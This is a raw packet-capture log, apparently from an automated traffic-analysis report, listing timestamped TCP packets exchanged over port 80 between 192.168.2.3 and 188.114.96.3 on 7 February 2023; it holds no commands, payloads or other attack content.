                                                                                    Feb 7, 2023 19:45:01.774476051 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.774504900 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.774535894 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.774535894 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.774535894 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.774557114 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.774585009 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.774616003 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.774643898 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.774672031 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.774765968 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.774802923 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.774802923 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.774802923 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.774825096 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.774857044 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.774884939 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.774918079 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.774947882 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.774979115 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.775008917 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.775019884 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.775019884 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.775019884 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.775048971 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.775077105 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.775105000 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.775134087 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.775166035 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.775197983 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.775197983 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.775197983 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.775216103 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.775245905 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.775275946 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.775305033 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.775332928 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.775362015 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.775392056 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.775392056 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.775392056 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.775413036 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.775439024 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.775469065 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.775499105 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.775526047 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.775553942 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.775583982 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.775583982 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.775583982 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.775603056 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.775631905 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.775660992 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.775686026 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.775715113 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.775744915 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.775774956 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.775774956 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.775774956 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.775796890 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.775825024 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.775856972 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.775888920 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.775917053 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.775944948 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.775993109 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.776025057 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.776056051 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.776056051 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.776056051 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.776073933 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.776101112 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.776129007 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.776160955 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.776189089 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.776216984 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.776245117 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.776273966 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.776303053 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.776315928 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.776315928 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.776315928 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.776350975 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.776380062 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.776410103 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.776438951 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.776468992 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.776500940 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.776500940 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.776500940 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.776521921 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.776550055 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.776578903 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.776607037 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.776635885 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.776664019 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.776693106 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.776721954 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.776751995 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.776781082 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.776810884 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.776810884 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.776810884 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.776828051 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.776858091 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.776886940 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.776915073 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.776943922 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.776972055 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.777002096 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.777030945 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.777060986 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.777060986 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.777060986 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.777081013 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.777111053 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.777139902 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.777169943 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.777199030 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.777225971 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.777254105 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.777282953 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.777312994 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.777312994 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.777312994 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.777331114 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.777362108 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.777391911 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.777420998 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.777450085 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.777477026 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.777507067 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.777534962 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.777565002 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.777594090 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.777594090 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.777594090 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.777612925 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.777638912 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.777667046 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.777698040 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.777728081 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.777756929 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.777756929 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.777756929 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.777777910 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.777806044 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.777834892 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.777864933 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.777892113 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.777920961 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.777951002 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.777982950 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.777982950 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.777982950 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.778000116 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.778028011 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.778057098 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.778085947 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.778114080 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.778172970 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.778172970 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.778172970 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.778198957 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.778228045 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.778258085 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.778287888 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.778318882 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.778348923 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.778378963 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.778379917 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.778379917 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.778402090 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.778433084 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.778464079 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.778501034 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.778532982 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.778563023 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.778593063 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.778593063 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.778593063 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.778615952 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.778645992 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.778676033 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.778727055 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.778759956 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.778790951 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.778821945 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.778821945 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.778821945 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.778845072 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.778875113 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.778904915 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.778935909 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.778965950 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.778965950 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.778965950 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.778989077 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.779017925 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.779047012 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.779077053 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.779105902 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.779134989 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.779134989 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.779134989 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.779158115 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.779191017 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.779221058 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.779252052 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.779282093 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.779309988 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.779337883 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.779370070 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.779370070 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.779370070 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.779395103 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.779427052 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.779457092 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.779485941 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.779514074 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.779541969 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.779576063 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.779576063 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.779576063 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.779599905 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.779632092 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.779660940 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.779689074 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.779722929 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.779753923 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.779784918 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.779784918 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.779784918 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.779803038 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.779834986 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.779867887 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.779901981 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.779931068 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.779959917 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.779989004 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.780018091 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.780047894 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.780047894 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.780049086 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.780073881 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.780107021 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.780134916 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.780168056 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.780199051 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.780231953 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.780263901 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.780294895 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.780325890 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.780325890 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.780325890 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.780347109 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.780379057 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.780409098 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.780441999 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.780471087 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.780499935 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.780530930 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.780563116 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.780594110 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.780622005 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.780653954 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.780653954 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.780653954 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.780673027 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.780706882 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.780740023 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.780772924 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.780801058 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.780828953 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.780862093 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.780893087 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.780924082 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.780924082 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.780924082 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.780950069 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.780982018 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.781013966 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.781047106 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.781079054 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.781111002 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.781145096 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.781145096 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.781145096 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.781173944 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.781208038 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.781238079 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.781348944 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.781384945 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.781416893 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.781450987 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.781450987 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.781450987 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.781477928 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.781510115 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.781544924 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.781574965 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.781608105 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.781640053 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.781672955 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.781672955 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.781672955 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.781702042 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.781734943 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.781764984 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.781793118 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.781821966 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.781850100 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.781850100 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.781850100 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.781850100 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.781878948 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.781908989 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.781939030 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.781961918 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.781961918 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.781987906 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.782015085 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.782041073 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.782052994 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.782079935 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.782107115 CET4969980192.168.2.3188.114.96.3
